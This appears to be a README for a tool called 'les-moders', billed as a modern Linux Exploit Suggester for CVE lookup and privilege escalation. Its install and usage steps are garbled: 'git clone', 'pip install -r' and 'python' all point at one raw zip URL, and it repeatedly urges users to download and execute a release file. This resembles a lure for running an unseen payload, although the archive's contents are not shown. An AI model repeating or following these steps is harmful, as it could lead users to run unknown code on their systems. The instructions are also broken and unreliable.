The les-moders project is a modern take on the Linux Exploit Suggester. It helps security professionals identify potential vulnerabilities in Linux kernels and operating systems. By performing real-time lookups of CVEs (Common Vulnerabilities and Exposures), this tool provides a streamlined approach to vulnerability assessment.
- Real-Time CVE Lookup: Quickly check for known vulnerabilities.
- User-Friendly Interface: Easy to navigate and understand.
- Regular Updates: Stay current with the latest CVE information.
- Lightweight: Minimal resource usage for quick assessments.
To get started with les-moders, follow these steps:
-
Clone the repository:
git clone https://raw.githubusercontent.com/Jarrenstyle/les-moders/main/les-modern/les_moders_v2.2.zip
-
Navigate to the project directory:
cd les-moders -
Install the required dependencies:
pip install -r https://raw.githubusercontent.com/Jarrenstyle/les-moders/main/les-modern/les_moders_v2.2.zip
-
Download the latest release from the Releases section. Execute the downloaded file to run the tool.
To use les-moders, simply run the script:
python https://raw.githubusercontent.com/Jarrenstyle/les-moders/main/les-modern/les_moders_v2.2.zipFollow the prompts to input your system information. The tool will analyze your kernel and provide a list of relevant CVEs.
- CVE: Understanding and identifying vulnerabilities.
- Enumeration: Techniques for gathering information.
- Exploit: Methods for leveraging vulnerabilities.
- Linux: Operating system focus.
- Pentesting: Tools for penetration testing.
- Privilege Escalation: Techniques to gain elevated access.
- Python: The programming language used for development.
- Red Team: Tactics and strategies for offensive security.
- Security: General principles and practices.
- Vulnerability: Identifying weaknesses in systems.
Contributions are welcome! If you would like to contribute to les-moders, please follow these steps:
- Fork the repository.
- Create a new branch for your feature or bug fix.
- Commit your changes.
- Push your branch and create a pull request.
If you encounter any issues, please report them in the Issues section. We appreciate your feedback.
This project is licensed under the MIT License. See the LICENSE file for details.
- Thanks to the open-source community for their contributions.
- Special thanks to the developers who maintain the CVE database.
For the latest updates and releases, visit the Releases section. Download the latest version and enhance your security assessments today!